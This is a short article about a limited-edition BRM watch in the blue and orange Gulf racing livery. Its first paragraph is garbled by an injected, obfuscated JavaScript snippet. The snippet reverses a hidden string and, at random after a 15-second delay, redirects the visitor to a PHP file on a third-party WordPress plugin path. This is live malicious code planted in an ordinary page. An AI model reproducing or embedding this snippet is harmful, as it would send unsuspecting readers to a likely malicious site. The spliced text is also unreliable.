BRM Gulf Colours. A Common Rarity

There are certain designs that withstand the test of time in motorsport, and seem to become more famous as the years go by. Aryton Senna’s helmet livery is a good example, as is the black and gold John Player Special Lotus livery from the 1970s. And then, there’s the $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/ford-gt40-chassis-p1074-le-mans-ickx-mcqueen/” target=”_blank”>blue and orange Gulf Racing livery, which first appeared in late 1960s and never looked back.

Indeed, so familiar is the livery to almost all and sundry today, that it’s not against the realms of possibility to see a road-going Ford adorned in blue and orange. Where then, you may be wondering, can we find a Gulf livery bedecked machine that retains some exclusivity?

This SD-41-GULF, the latest edition to the Bernard Richards Manufacture (BRM) collection, may prove to be the answer. Alongside the traditional colours, the new timepiece also includes a brushed crown engraved Gulf emblem, a racing stripe across the watch face, and a black leather strap.

Exclusivity though, as it so often does, comes at a price. And that price is a double take worthy €7100 (around $9000). Take heart though: chances are, with only 200 models available, these will stand the test of time too.
